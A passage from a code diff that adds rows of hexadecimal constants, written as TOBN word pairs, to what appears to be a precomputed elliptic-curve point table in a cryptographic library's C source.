+     TOBN(0xf145e21e, 0x9e70c72e), TOBN(0xb2e52e29, 0x5566d2fb),
+     TOBN(0x44eaba4a, 0x032397f5), TOBN(0x5e56937b, 0x7e31a7de),
+     TOBN(0x68dcf517, 0x456c61e1), TOBN(0xbc2e954a, 0xa8b0a388),
+     TOBN(0xe3552fa7, 0x60a8b755), TOBN(0x03442dae, 0x73ad0cde),
+     TOBN(0x37ffe747, 0xceb26210), TOBN(0x983545e8, 0x787baef9),
+     TOBN(0x8b8c8535, 0x86a3de31), TOBN(0xc621dbcb, 0xfacd46db),
+     TOBN(0x82e442e9, 0x59266fbb), TOBN(0xa3514c37, 0x339d471c),
+     TOBN(0x3a11b771, 0x62cdad96), TOBN(0xf0cb3b3c, 0xecf9bdf0),
+     TOBN(0x3fcbdbce, 0x478e2135), TOBN(0x7547b5cf, 0xbda35342),
+     TOBN(0xa97e81f1, 0x8a677af6), TOBN(0xc8c2bf83, 0x28817987),
+     TOBN(0xdf07eaaf, 0x45580985), TOBN(0xc68d1f05, 0xc93b45cb),
+     TOBN(0x106aa2fe, 0xc77b4cac), TOBN(0x4c1d8afc, 0x04a7ae86),
+     TOBN(0xdb41c3fd, 0x9eb45ab2), TOBN(0x5b234b5b, 0xd4b22e74),
+     TOBN(0xda253dec, 0xf215958a), TOBN(0x67e0606e, 0xa04edfa0),
+     TOBN(0xabbbf070, 0xef751b11), TOBN(0xf352f175, 0xf6f06dce),
+     TOBN(0xdfc4b6af, 0x6839f6b4), TOBN(0x53ddf9a8, 0x9959848e),
+     TOBN(0xda49c379, 0xc21520b0), TOBN(0x90864ff0, 0xdbd5d1b6),
+     TOBN(0x2f055d23, 0x5f49c7f7), TOBN(0xe51e4e6a, 0xa796b2d8),
+     TOBN(0xc361a67f, 0x5c9dc340), TOBN(0x5ad53c37, 0xbca7c620),
+     TOBN(0xda1d6588, 0x32c756d0), TOBN(0xad60d911, 0x8bb67e13),
+     TOBN(0xd6c47bdf, 0x0eeec8c6), TOBN(0x4a27fec1, 0x078a1821),
+     TOBN(0x081f7415, 0xc3099524), TOBN(0x8effdf0b, 0x82cd8060),
+     TOBN(0xdb70ec1c, 0x65842df8), TOBN(0x8821b358, 0xd319a901),
+     TOBN(0x72ee56ee, 0xde42b529), TOBN(0x5bb39592, 0x236e4286),
+     TOBN(0xd1183316, 0xfd6f7140), TOBN(0xf9fadb5b, 0xbd8e81f7),
+     TOBN(0x701d5e0c, 0x5a02d962), TOBN(0xfdee4dbf, 0x1b601324),
+     TOBN(0xbed17407, 0x35d7620e), TOBN(0x04e3c2c3, 0xf48c0012),
+     TOBN(0x9ee29da7, 0x3455449a), TOBN(0x562cdef4, 0x91a836c4),
+     TOBN(0x8f682a5f, 0x47701097), TOBN(0x617125d8, 0xff88d0c2),
+     TOBN(0x948fda24, 0x57bb86dd), TOBN(0x348abb8f, 0x289f7286),
+     TOBN(0xeb10eab5, 0x99d94bbd), TOBN(0xd51ba28e, 0x4684d160),
+     TOBN(0xabe0e51c, 0x30c8f41a), TOBN(0x66588b45, 0x13254f4a),
+     TOBN(0x147ebf01, 0xfad097a5), TOBN(0x49883ea8, 0x610e815d),
+     TOBN(0xe44d60ba, 0x8a11de56), TOBN(0xa970de6e, 0x827a7a6d),
+     TOBN(0x2be41424, 0x5e17fc19), TOBN(0xd833c657, 0x01214057),
+     TOBN(0x1375813b, 0x363e723f), TOBN(0x6820bb88, 0xe6a52e9b),
+     TOBN(0x7e7f6970, 0xd875d56a), TOBN(0xd6a0a9ac, 0x51fbf6bf),
+     TOBN(0x54ba8790, 0xa3083c12), TOBN(0xebaeb23d, 0x6ae7eb64),
+     TOBN(0xa8685c3a, 0xb99a907a), TOBN(0xf1e74550, 0x026bf40b),
+     TOBN(0x7b73a027, 0xc802cd9e), TOBN(0x9a8a927c, 0x4fef4635),
+     TOBN(0xe1b6f60c, 0x08191224), TOBN(0xc4126ebb, 0xde4ec091),
+     TOBN(0xe1dff4dc, 0x4ae38d84), TOBN(0xde3f57db, 0x4f2ef985),
+     TOBN(0x34964337, 0xd446a1dd), TOBN(0x7bf217a0, 0x859e77f6),
+     TOBN(0x8ff10527, 0x8e1d13f5), TOBN(0xa304ef03, 0x74eeae27),
+     TOBN(0xfc6f5e47, 0xd19dfa5a), TOBN(0xdb007de3, 0x7fad982b),
+     TOBN(0x28205ad1, 0x613715f5), TOBN(0x251e6729, 0x7889529e),
+     TOBN(0x72705184, 0x1ae98e78), TOBN(0xf818537d, 0x271cac32),
+     TOBN(0xc8a15b7e, 0xb7f410f5), TOBN(0xc474356f, 0x81f62393),
+     TOBN(0x92dbdc5a, 0xc242316b), TOBN(0xabe060ac, 0xdbf4aff5),
+     TOBN(0x6e8c38fe, 0x909a8ec6), TOBN(0x43e514e5, 0x6116cb94),
+     TOBN(0x2078fa38, 0x07d784f9), TOBN(0x1161a880, 0xf4b5b357),
+     TOBN(0x5283ce79, 0x13adea3d), TOBN(0x0756c3e6, 0xcc6a910b),
+     TOBN(0x60bcfe01, 0xaaa79697), TOBN(0x04a73b29, 0x56391db1),
+     TOBN(0xdd8dad47, 0x189b45a0), TOBN(0xbfac0dd0, 0x48d5b8d9),
+     TOBN(0x34ab3af5, 0x7d3d2ec2), TOBN(0x6fa2fc2d, 0x207bd3af),
+     TOBN(0x9ff40092, 0x66550ded), TOBN(0x719b3e87, 0x1fd5b913),
+     TOBN(0xa573a496, 0x6d17fbc7), TOBN(0x0cd1a70a, 0x73d2b24e),
+     TOBN(0x34e2c5ca, 0xb2676937), TOBN(0xe7050b06, 0xbf669f21),
+     TOBN(0xfbe948b6, 0x1ede9046), TOBN(0xa0530051, 0x97662659),
+     TOBN(0x58cbd4ed, 0xf10124c5), TOBN(0xde2646e4, 0xdd6c06c8),
+     TOBN(0x332f8108, 0x8cad38c0), TOBN(0x471b7e90, 0x6bd68ae2),
+     TOBN(0x56ac3fb2, 0x0d8e27a3), TOBN(0xb54660db, 0x136b4b0d),
+     TOBN(0x123a1e11, 0xa6fd8de4), TOBN(0x44dbffea, 0xa37799ef),
+     TOBN(0x4540b977, 0xce6ac17c), TOBN(0x495173a8, 0xaf60acef)}
+    ,
+    {TOBN(0x9ebb284d, 0x391c2a82), TOBN(0xbcdd4863, 0x158308e8),
+     TOBN(0x006f16ec, 0x83f1edca), TOBN(0xa13e2c37, 0x695dc6c8),
+     TOBN(0x2ab756f0, 0x4a057a87), TOBN(0xa8765500, 0xa6b48f98),
+     TOBN(0x4252face, 0x68651c44), TOBN(0xa52b540b, 0xe1765e02),
+     TOBN(0x4f922fc5, 0x16a0d2bb), TOBN(0x0d5cc16c, 0x1a623499),
+     TOBN(0x9241cf3a, 0x57c62c8b), TOBN(0x2f5e6961, 0xfd1b667f),
+     TOBN(0x5c15c70b, 0xf5a01797), TOBN(0x3d20b44d, 0x60956192),
+     TOBN(0x04911b37, 0x071fdb52), TOBN(0xf648f916, 0x8d6f0f7b),
+     TOBN(0x6dc1acaf, 0xe60b7cf7), TOBN(0x25860a50, 0x84a9d869),
+     TOBN(0x56fc6f09, 0xe7ba8ac4), TOBN(0x828c5bd0, 0x6148d29e),
+     TOBN(0xac6b435e, 0xdc55ae5f), TOBN(0xa527f56c, 0xc0117411),
+     TOBN(0x94d5045e, 0xfd24342c), TOBN(0x2c4c0a35, 0x70b67c0d),
+     TOBN(0x027cc8b8, 0xfac61d9a), TOBN(0x7d25e062, 0xe3c6fe8a),
+     TOBN(0xe08805bf, 0xe5bff503), TOBN(0x13271e6c, 0x6ff632f7),
+     TOBN(0x55dca6c0, 0x232f76a5), TOBN(0x8957c32d, 0x701ef426),
+     TOBN(0xee728bcb, 0xa10a5178), TOBN(0x5ea60411, 0xb62c5173),
+     TOBN(0xfc4e964e, 0xd0b8892b), TOBN(0x9ea17683, 0x9301bb74),
+     TOBN(0x6265c5ae, 0xfcc48626), TOBN(0xe60cf82e, 0xbb3e9102),
+     TOBN(0x57adf797, 0xd4df5531), TOBN(0x235b59a1, 0x8deeefe2),
+     TOBN(0x60adcf58, 0x3f306eb1), TOBN(0x105c2753, 0x3d09492d),
+     TOBN(0x4090914b, 0xb5def996), TOBN(0x1cb69c83, 0x233dd1e7),
+     TOBN(0xc1e9c1d3, 0x9b3d5e76), TOBN(0x1f3338ed, 0xfccf6012),
+     TOBN(0xb1e95d0d, 0x2f5378a8), TOBN(0xacf4c2c7, 0x2f00cd21),
+     TOBN(0x6e984240, 0xeb5fe290), TOBN(0xd66c038d, 0x248088ae),
+     TOBN(0x804d264a, 0xf94d70cf), TOBN(0xbdb802ef, 0x7314bf7e),
+     TOBN(0x8fb54de2, 0x4333ed02), TOBN(0x740461e0, 0x285635d9),
+     TOBN(0x4113b2c8, 0x365e9383), TOBN(0xea762c83, 0x3fdef652),
+     TOBN(0x4eec6e2e, 0x47b956c1), TOBN(0xa3d814be, 0x65620fa4),
+     TOBN(0x9ad5462b, 0xb4d8bc50), TOBN(0x181c0b16, 0xa9195770),
+     TOBN(0xebd4fe1c, 0x78412a68), TOBN(0xae0341bc, 0xc0dff48c),
+     TOBN(0xb6bc45cf, 0x7003e866), TOBN(0xf11a6dea, 0x8a24a41b),
+     TOBN(0x5407151a, 0xd04c24c2), TOBN(0x62c9d27d, 0xda5b7b68),
+     TOBN(0x2e964235, 0x88cceff6), TOBN(0x8594c54f, 0x8b07ed69),
+     TOBN(0x1578e73c, 0xc84d0d0d), TOBN(0x7b4e1055, 0xff532868),
+     TOBN(0xa348c0d5, 0xb5ec995a), TOBN(0xbf4b9d55, 0x14289a54),
+     TOBN(0x9ba155a6, 0x58fbd777), TOBN(0x186ed7a8, 0x1a84491d),
+     TOBN(0xd4992b30, 0x614c0900), TOBN(0xda98d121, 0xbd00c24b),
+     TOBN(0x7f534dc8, 0x7ec4bfa1), TOBN(0x4a5ff674, 0x37dc34bc),
+     TOBN(0x68c196b8, 0x1d7ea1d7), TOBN(0x38cf2893, 0x80a6d208),
+     TOBN(0xfd56cd09, 0xe3cbbd6e), TOBN(0xec72e27e, 0x4205a5b6),
+     TOBN(0x15ea68f5, 0xa44f77f7), TOBN(0x7aa5f9fd, 0xb43c52bc),
+     TOBN(0x86ff676f, 0x94f0e609), TOBN(0xa4cde963, 0x2e2d432b),
+     TOBN(0x8cafa0c0, 0xeee470af), TOBN(0x84137d0e, 0x8a3f5ec8),
+     TOBN(0xebb40411, 0xfaa31231), TOBN(0xa239c13f, 0x6f7f7ccf),
+     TOBN(0x32865719, 0xa8afd30b), TOBN(0x86798328, 0x8a826dce),
+     TOBN(0xdf04e891, 0xc4a8fbe0), TOBN(0xbb6b6e1b, 0xebf56ad3),
+     TOBN(0x0a695b11, 0x471f1ff0), TOBN(0xd76c3389, 0xbe15baf0),
+     TOBN(0x018edb95, 0xbe96c43e), TOBN(0xf2beaaf4, 0x90794158),
+     TOBN(0x152db09e, 0xc3076a27), TOBN(0x5e82908e, 0xe416545d),
+     TOBN(0xa2c41272, 0x356d6f2e), TOBN(0xdc9c9642, 0x31fd74e1),
+     TOBN(0x66ceb88d, 0x519bf615), TOBN(0xe29ecd76, 0x05a2274e),
+     TOBN(0x3a0473c4, 0xbf5e2fa0), TOBN(0x6b6eb671, 0x64284e67),
+     TOBN(0xe8b97932, 0xb88756dd), TOBN(0xed4e8652, 0xf17e3e61),
+     TOBN(0xc2dd1499, 0x3ee1c4a4), TOBN(0xc0aaee17, 0x597f8c0e),
+     TOBN(0x15c4edb9, 0x6c168af3), TOBN(0x6563c7bf, 0xb39ae875),
+     TOBN(0xadfadb6f, 0x20adb436), TOBN(0xad55e8c9, 0x9a042ac0),
+     TOBN(0x975a1ed8, 0xb76da1f5), TOBN(0x10dfa466, 0xa58acb94),
+     TOBN(0x8dd7f7e3, 0xac060282), TOBN(0x6813e66a, 0x572a051e),
+     TOBN(0xb4ccae1e, 0x350cb901), TOBN(0xb653d656, 0x50cb7822),
+     TOBN(0x42484710, 0xdfab3b87), TOBN(0xcd7ee537, 0x9b670fd0),
+     TOBN(0x0a50b12e, 0x523b8bf6), TOBN(0x8009eb5b, 0x8f910c1b),
+     TOBN(0xf535af82, 0x4a167588), TOBN(0x0f835f9c, 0xfb2a2abd),
+     TOBN(0xf59b2931, 0x2afceb62), TOBN(0xc797df2a, 0x169d383f),
+     TOBN(0xeb3f5fb0, 0x66ac02b0), TOBN(0x029d4c6f, 0xdaa2d0ca),
+     TOBN(0xd4059bc1, 0xafab4bc5), TOBN(0x833f5c6f, 0x56783247),
+     TOBN(0xb5346630, 0x8d2d3605), TOBN(0x83387891, 0xd34d8433),
+     TOBN(0xd973b30f, 0xadd9419a), TOBN(0xbcca1099, 0xafe3fce8),
+     TOBN(0x08178315, 0x0809aac6), TOBN(0x01b7f21a, 0x540f0f11),
+     TOBN(0x65c29219, 0x909523c8), TOBN(0xa62f648f, 0xa3a1c741),
+     TOBN(0x88598d4f, 0x60c9e55a), TOBN(0xbce9141b, 0x0e4f347a),
+     TOBN(0x9af97d84, 0x35f9b988), TOBN(0x0210da62, 0x320475b6),
+     TOBN(0x3c076e22, 0x9191476c), TOBN(0x7520dbd9, 0x44fc7834),
+     TOBN(0x6a6b2cfe, 0xc1ab1bbd), TOBN(0xef8a65be, 0xdc650938),
+     TOBN(0x72855540, 0x805d7bc4), TOBN(0xda389396, 0xed11fdfd),
+     TOBN(0xa9d5bd36, 0x74660876), TOBN(0x11d67c54, 0xb45dff35),
+     TOBN(0x6af7d148, 0xa4f5da94), TOBN(0xbb8d4c3f, 0xc0bbeb31),
+     TOBN(0x87a7ebd1, 0xe0a1b12a), TOBN(0x1e4ef88d, 0x770ba95f),
+     TOBN(0x8c33345c, 0xdc2ae9cb), TOBN(0xcecf1276, 0x01cc8403),
+     TOBN(0x687c012e, 0x1b39b80f), TOBN(0xfd90d0ad, 0x35c33ba4),
+     TOBN(0xa3ef5a67, 0x5c9661c2), TOBN(0x368fc88e, 0xe017429e),
+     TOBN(0xd30c6761, 0x196a2fa2), TOBN(0x931b9817, 0xbd5b312e),
+     TOBN(0xba01000c, 0x72f54a31), TOBN(0xa203d2c8, 0x66eaa541),
+     TOBN(0xf2abdee0, 0x98939db3), TOBN(0xe37d6c2c, 0x3e606c02),
+     TOBN(0xf2921574, 0x521ff643), TOBN(0x2781b3c4, 0xd7e2fca3),
+     TOBN(0x664300b0, 0x7850ec06), TOBN(0xac5a38b9, 0x7d3a10cf),
+     TOBN(0x9233188d, 0xe34ab39d), TOBN(0xe77057e4, 0x5072cbb9),
+     TOBN(0xbcf0c042, 0xb59e78df), TOBN(0x4cfc91e8, 0x1d97de52),
+     TOBN(0x4661a26c, 0x3ee0ca4a), TOBN(0x5620a4c1, 0xfb8507bc),
+     TOBN(0x4b44d4aa, 0x049f842c), TOBN(0xceabc5d5, 0x1540e82b),
+     TOBN(0x306710fd, 0x15c6f156), TOBN(0xbe5ae52b, 0x63db1d72),
+     TOBN(0x06f1e7e6, 0x334957f1), TOBN(0x57e388f0, 0x31144a70),
+     TOBN(0xfb69bb2f, 0xdf96447b), TOBN(0x0f78ebd3, 0x73e38a12),
+     TOBN(0xb8222605, 0x2b7ce542), TOBN(0xe6d4ce99, 0x7472bde1),
+     TOBN(0x53e16ebe, 0x09d2f4da), TOBN(0x180ff42e, 0x53b92b2e),
+     TOBN(0xc59bcc02, 0x2c34a1c6), TOBN(0x3803d6f9, 0x422c46c2),
+     TOBN(0x18aff74f, 0x5c14a8a2), TOBN(0x55aebf80, 0x10a08b28),
+     TOBN(0x66097d58, 0x7135593f), TOBN(0x32e6eff7, 0x2be570cd),
+     TOBN(0x584e6a10, 0x2a8c860d), TOBN(0xcd185890, 0xa2eb4163),
+     TOBN(0x7ceae99d, 0x6d97e134), TOBN(0xd42c6b70, 0xdd8447ce),
+     TOBN(0x59ddbb4a, 0xb8c50273), TOBN(0x03c612df, 0x3cf34e1e),
+     TOBN(0x84b9ca15, 0x04b6c5a0), TOBN(0x35216f39, 0x18f0e3a3),
+     TOBN(0x3ec2d2bc, 0xbd986c00), TOBN(0x8bf546d9, 0xd19228fe),
+     TOBN(0xd1c655a4, 0x4cd623c3), TOBN(0x366ce718, 0x502b8e5a),
+     TOBN(0x2cfc84b4, 0xeea0bfe7), TOBN(0xe01d5cee, 0xcf443e8e),
+     TOBN(0x8ec045d9, 0x036520f8), TOBN(0xdfb3c3d1, 0x92d40e98),
+     TOBN(0x0bac4cce, 0xcc559a04), TOBN(0x35eccae5, 0x240ea6b1),
+     TOBN(0x180b32db, 0xf8a5a0ac), TOBN(0x547972a5, 0xeb699700),
+     TOBN(0xa3765801, 0xca26bca0), TOBN(0x57e09d0e, 0xa647f25a),
+     TOBN(0xb956970e, 0x2fdd23cc), TOBN(0xb80288bc, 0x5682e971),
+     TOBN(0xe6e6d91e, 0x9ae86ebc), TOBN(0x0564c83f, 0x8c9f1939),
+     TOBN(0x551932a2, 0x39560368), TOBN(0xe893752b, 0x049c28e2),
+     TOBN(0x0b03cee5, 0xa6a158c3), TOBN(0xe12d656b, 0x04964263),
+     TOBN(0x4b47554e, 0x63e3bc1d), TOBN(0xc719b6a2, 0x45044ff7),
+     TOBN(0x4f24d30a, 0xe48daa07), TOBN(0xa3f37556, 0xc8c1edc3),
+     TOBN(0x9a47bf76, 0x0700d360), TOBN(0xbb1a1824, 0x822ae4e2),
+     TOBN(0x22e275a3, 0x89f1fb4c), TOBN(0x72b1aa23, 0x9968c5f5),
+     TOBN(0xa75feaca, 0xbe063f64), TOBN(0x9b392f43, 0xbce47a09),
+     TOBN(0xd4241509, 0x1ad07aca), TOBN(0x4b0c591b, 0x8d26cd0f),
+     TOBN(0x2d42ddfd, 0x92f1169a), TOBN(0x63aeb1ac, 0x4cbf2392),
+     TOBN(0x1de9e877, 0x0691a2af), TOBN(0xebe79af7, 0xd98021da),
+     TOBN(0xcfdf2a4e, 0x40e50acf), TOBN(0xf0a98ad7, 0xaf01d665),
+     TOBN(0xefb640bf, 0x1831be1f), TOBN(0x6fe8bd2f, 0x80e9ada0),
+     TOBN(0x94c103a1, 0x6cafbc91), TOBN(0x170f8759, 0x8308e08c),
+     TOBN(0x5de2d2ab, 0x9780ff4f), TOBN(0x666466bc, 0x45b201f2),
+     TOBN(0x58af2010, 0xf5b343bc), TOBN(0x0f2e400a, 0xf2f142fe),
+     TOBN(0x3483bfde, 0xa85f4bdf), TOBN(0xf0b1d093, 0x03bfeaa9),
+     TOBN(0x2ea01b95, 0xc7081603), TOBN(0xe943e4c9, 0x3dba1097),
+     TOBN(0x47be92ad, 0xb438f3a6), TOBN(0x00bb7742, 0xe5bf6636),
+     TOBN(0x136b7083, 0x824297b4), TOBN(0x9d0e5580, 0x5584455f),
+     TOBN(0xab48cedc, 0xf1c7d69e), TOBN(0x53a9e481, 0x2a256e76),
+     TOBN(0x0402b0e0, 0x65eb2413), TOBN(0xdadbbb84, 0x8fc407a7),
+     TOBN(0xa65cd5a4, 0x8d7f5492), TOBN(0x21d44293, 0x74bae294),
+     TOBN(0x66917ce6, 0x3b5f1cc4), TOBN(0x37ae52ea, 0xce872e62),
+     TOBN(0xbb087b72, 0x2905f244), TOBN(0x12077086, 0x1e6af74f),
+     TOBN(0x4b644e49, 0x1058edea), TOBN(0x827510e3, 0xb638ca1d),
+     TOBN(0x8cf2b704, 0x6038591c), TOBN(0xffc8b47a, 0xfe635063),
+     TOBN(0x3ae220e6, 0x1b4d5e63), TOBN(0xbd864742, 0x9d961b4b),
+     TOBN(0x610c107e, 0x9bd16bed), TOBN(0x4270352a, 0x1127147b),
+     TOBN(0x7d17ffe6, 0x64cfc50e), TOBN(0x50dee01a, 0x1e36cb42),
+     TOBN(0x068a7622, 0x35dc5f9a), TOBN(0x9a08d536, 0xdf53f62c),
+     TOBN(0x4ed71457, 0x6be5f7de), TOBN(0xd93006f8, 0xc2263c9e),
+     TOBN(0xe073694c, 0xcacacb36), TOBN(0x2ff7a5b4, 0x3ae118ab),
+     TOBN(0x3cce53f1, 0xcd871236), TOBN(0xf156a39d, 0xc2aa6d52),
+     TOBN(0x9cc5f271, 0xb198d76d), TOBN(0xbc615b6f, 0x81383d39),
+     TOBN(0xa54538e8, 0xde3eee6b), TOBN(0x58c77538, 0xab910d91),
+     TOBN(0x31e5bdbc, 0x58d278bd), TOBN(0x3cde4adf, 0xb963acae),
+     TOBN(0xb1881fd2, 0x5302169c), TOBN(0x8ca60fa0, 0xa989ed8b),
+     TOBN(0xa1999458, 0xff96a0ee), TOBN(0xc1141f03, 0xac6c283d),
+     TOBN(0x7677408d, 0x6dfafed3), TOBN(0x33a01653, 0x39661588),
+     TOBN(0x3c9c15ec, 0x0b726fa0), TOBN(0x090cfd93, 0x6c9b56da),
+     TOBN(0xe34f4bae, 0xa3c40af5), TOBN(0x3469eadb, 0xd21129f1),
+     TOBN(0xcc51674a, 0x1e207ce8), TOBN(0x1e293b24, 0xc83b1ef9),
+     TOBN(0x17173d13, 0x1e6c0bb4), TOBN(0x19004695, 0x90776d35),
+     TOBN(0xe7980e34, 0x6de6f922), TOBN(0x873554cb, 0xf4dd9a22),
+     TOBN(0x0316c627, 0xcbf18a51), TOBN(0x4d93651b, 0x3032c081),
+     TOBN(0x207f2771, 0x3946834d), TOBN(0x2c08d7b4, 0x30cdbf80),
+     TOBN(0x137a4fb4, 0x86df2a61), TOBN(0xa1ed9c07, 0xecf7b4a2),
+     TOBN(0xb2e460e2, 0x7bd042ff), TOBN(0xb7f5e2fa, 0x5f62f5ec),
+     TOBN(0x7aa6ec6b, 0xcc2423b7), TOBN(0x75ce0a7f, 0xba63eea7),
+     TOBN(0x67a45fb1, 0xf250a6e1), TOBN(0x93bc919c, 0xe53cdc9f),
+     TOBN(0x9271f56f, 0x871942df), TOBN(0x2372ff6f, 0x7859ad66),
+     TOBN(0x5f4c2b96, 0x33cb1a78), TOBN(0xe3e29101, 0x5838aa83),
+     TOBN(0xa7ed1611, 0xe4e8110c), TOBN(0x2a2d70d5, 0x330198ce),
+     TOBN(0xbdf132e8, 0x6720efe0), TOBN(0xe61a8962, 0x66a471bf),
+     TOBN(0x796d3a85, 0x825808bd), TOBN(0x51dc3cb7, 0x3fd6e902),
+     TOBN(0x643c768a, 0x916219d1), TOBN(0x36cd7685, 0xa2ad7d32),
+     TOBN(0xe3db9d05, 0xb22922a4), TOBN(0x6494c87e, 0xdba29660),
+     TOBN(0xf0ac91df, 0xbcd2ebc7), TOBN(0x4deb57a0, 0x45107f8d),
+     TOBN(0x42271f59, 0xc3d12a73), TOBN(0x5f71687c, 0xa5c2c51d),
+     TOBN(0xcb1f50c6, 0x05797bcb), TOBN(0x29ed0ed9, 0xd6d34eb0),
+     TOBN(0xe5fe5b47, 0x4683c2eb), TOBN(0x4956eeb5, 0x97447c46),
+     TOBN(0x5b163a43, 0x71207167), TOBN(0x93fa2fed, 0x0248c5ef),
+     TOBN(0x67930af2, 0x31f63950), TOBN(0xa77797c1, 0x14caa2c9),
+     TOBN(0x526e80ee, 0x27ac7e62), TOBN(0xe1e6e626, 0x58b28aec),
+     TOBN(0x636178b0, 0xb3c9fef0), TOBN(0xaf7752e0, 0x6d5f90be),
+     TOBN(0x94ecaf18, 0xeece51cf), TOBN(0x2864d0ed, 0xca806e1f),
+     TOBN(0x6de2e383, 0x97c69134), TOBN(0x5a42c316, 0xeb291293),
+     TOBN(0xc7779219, 0x6a60bae0), TOBN(0xa24de346, 0x6b7599d1),
+     TOBN(0x49d374aa, 0xb75d4941), TOBN(0x98900586, 0x2d501ff0),
+     TOBN(0x9f16d40e, 0xeb7974cf), TOBN(0x1033860b, 0xcdd8c115),
+     TOBN(0xb6c69ac8, 0x2094cec3), TOBN(0x9976fb88, 0x403b770c),
+     TOBN(0x1dea026c, 0x4859590d), TOBN(0xb6acbb46, 0x8562d1fd),
+     TOBN(0x7cd6c461, 0x44569d85), TOBN(0xc3190a36, 0x97f0891d),
+     TOBN(0xc6f53195, 0x48d5a17d), TOBN(0x7d919966, 0xd749abc8),
+     TOBN(0x65104837, 0xdd1c8a20), TOBN(0x7e5410c8, 0x2f683419),
+     TOBN(0x958c3ca8, 0xbe94022e), TOBN(0x605c3197, 0x6145dac2),
+     TOBN(0x3fc07501, 0x01683d54), TOBN(0x1d7127c5, 0x595b1234),
+     TOBN(0x10b8f87c, 0x9481277f), TOBN(0x677db2a8, 0xe65a1adb),
+     TOBN(0xec2fccaa, 0xddce3345), TOBN(0x2a6811b7, 0x012a4350),
+     TOBN(0x96760ff1, 0xac598bdc), TOBN(0x054d652a, 0xd1bf4128),
+     TOBN(0x0a1151d4, 0x92a21005), TOBN(0xad7f3971, 0x33110fdf),
+     TOBN(0x8c95928c, 0x1960100f), TOBN(0x6c91c825, 0x7bf03362),
+     TOBN(0xc8c8b2a2, 0xce309f06), TOBN(0xfdb27b59, 0xca27204b),
+     TOBN(0xd223eaa5, 0x0848e32e), TOBN(0xb93e4b2e, 0xe7bfaf1e),
+     TOBN(0xc5308ae6, 0x44aa3ded), TOBN(0x317a666a, 0xc015d573),
+     TOBN(0xc888ce23, 0x1a979707), TOBN(0xf141c1e6, 0x0d5c4958),
+     TOBN(0xb53b7de5, 0x61906373), TOBN(0x858dbade, 0xeb999595),
+     TOBN(0x8cbb47b2, 0xa59e5c36), TOBN(0x660318b3, 0xdcf4e842),
+     TOBN(0xbd161ccd, 0x12ba4b7a), TOBN(0xf399daab, 0xf8c8282a),
+     TOBN(0x1587633a, 0xeeb2130d), TOBN(0xa465311a, 0xda38dd7d),
+     TOBN(0x5f75eec8, 0x64d3779b), TOBN(0x3c5d0476, 0xad64c171),
+     TOBN(0x87410371, 0x2a914428), TOBN(0x8096a891, 0x90e2fc29),
+     TOBN(0xd3d2ae9d, 0x23b3ebc2), TOBN(0x90bdd6db, 0xa580cfd6),
+     TOBN(0x52dbb7f3, 0xc5b01f6c), TOBN(0xe68eded4, 0xe102a2dc),
+     TOBN(0x17785b77, 0x99eb6df0), TOBN(0x26c3cc51, 0x7386b779),
+     TOBN(0x345ed988, 0x6417a48e), TOBN(0xe990b4e4, 0x07d6ef31),
+     TOBN(0x0f456b7e, 0x2586abba), TOBN(0x239ca6a5, 0x59c96e9a),
+     TOBN(0xe327459c, 0xe2eb4206), TOBN(0x3a4c3313, 0xa002b90a),
+     TOBN(0x2a114806, 0xf6a3f6fb), TOBN(0xad5cad2f, 0x85c251dd),
+     TOBN(0x92c1f613, 0xf5a784d3), TOBN(0xec7bfacf, 0x349766d5),
+     TOBN(0x04b3cd33, 0x3e23cb3b), TOBN(0x3979fe84, 0xc5a64b2d),
+     TOBN(0x192e2720, 0x7e589106), TOBN(0xa60c43d1, 0xa15b527f),
+     TOBN(0x2dae9082, 0xbe7cf3a6), TOBN(0xcc86ba92, 0xbc967274),
+     TOBN(0xf28a2ce8, 0xaea0a8a9), TOBN(0x404ca6d9, 0x6ee988b3),
+     TOBN(0xfd7e9c5d, 0x005921b8), TOBN(0xf56297f1, 0x44e79bf9),
+     TOBN(0xa163b460, 0x0d75ddc2), TOBN(0x30b23616, 0xa1f2be87),
+     TOBN(0x4b070d21, 0xbfe50e2b), TOBN(0x7ef8cfd0, 0xe1bfede1),
+     TOBN(0xadba0011, 0x2aac4ae0), TOBN(0x2a3e7d01, 0xb9ebd033),
+     TOBN(0x995277ec, 0xe38d9d1c), TOBN(0xb500249e, 0x9c5d2de3),
+     TOBN(0x8912b820, 0xf13ca8c9), TOBN(0xc8798114, 0x877793af),
+     TOBN(0x19e6125d, 0xec3f1dec), TOBN(0x07b1f040, 0x911178da),
+     TOBN(0xd93ededa, 0x904a6738), TOBN(0x55187a5a, 0x0bebedcd),
+     TOBN(0xf7d04722, 0xeb329d41), TOBN(0xf449099e, 0xf170b391),
+     TOBN(0xfd317a69, 0xca99f828), TOBN(0x50c3db2b, 0x34a4976d),
+     TOBN(0xe9ba7784, 0x3757b392), TOBN(0x326caefd, 0xaa3ca05a),
+     TOBN(0x78e5293b, 0xf1e593d4), TOBN(0x7842a937, 0x0d98fd13),
+     TOBN(0xe694bf96, 0x5f96b10d), TOBN(0x373a9df6, 0x06a8cd05),
+     TOBN(0x997d1e51, 0xe8f0c7fc), TOBN(0x1d019790, 0x63fd972e),
+     TOBN(0x0064d858, 0x5499fb32), TOBN(0x7b67bad9, 0x77a8aeb7),
+     TOBN(0x1d3eb977, 0x2d08eec5), TOBN(0x5fc047a6, 0xcbabae1d),
+     TOBN(0x0577d159, 0xe54a64bb), TOBN(0x8862201b, 0xc43497e4),
+     TOBN(0xad6b4e28, 0x2ce0608d), TOBN(0x8b687b7d, 0x0b167aac),
+     TOBN(0x6ed4d367, 0x8b2ecfa9), TOBN(0x24dfe62d, 0xa90c3c38),
+     TOBN(0xa1862e10, 0x3fe5c42b), TOBN(0x1ca73dca, 0xd5732a9f),
+     TOBN(0x35f038b7, 0x76bb87ad), TOBN(0x674976ab, 0xf242b81f),
+     TOBN(0x4f2bde7e, 0xb0fd90cd), TOBN(0x6efc172e, 0xa7fdf092),
+     TOBN(0x3806b69b, 0x92222f1f), TOBN(0x5a2459ca, 0x6cf7ae70),
+     TOBN(0x6789f69c, 0xa85217ee), TOBN(0x5f232b5e, 0xe3dc85ac),
+     TOBN(0x660e3ec5, 0x48e9e516), TOBN(0x124b4e47, 0x3197eb31),
+     TOBN(0x10a0cb13, 0xaafcca23), TOBN(0x7bd63ba4, 0x8213224f),
+     TOBN(0xaffad7cc, 0x290a7f4f), TOBN(0x6b409c9e, 0x0286b461),
+     TOBN(0x58ab809f, 0xffa407af), TOBN(0xc3122eed, 0xc68ac073),
+     TOBN(0x17bf9e50, 0x4ef24d7e), TOBN(0x5d929794, 0x3e2a5811),
+     TOBN(0x519bc867, 0x02902e01), TOBN(0x76bba5da, 0x39c8a851),
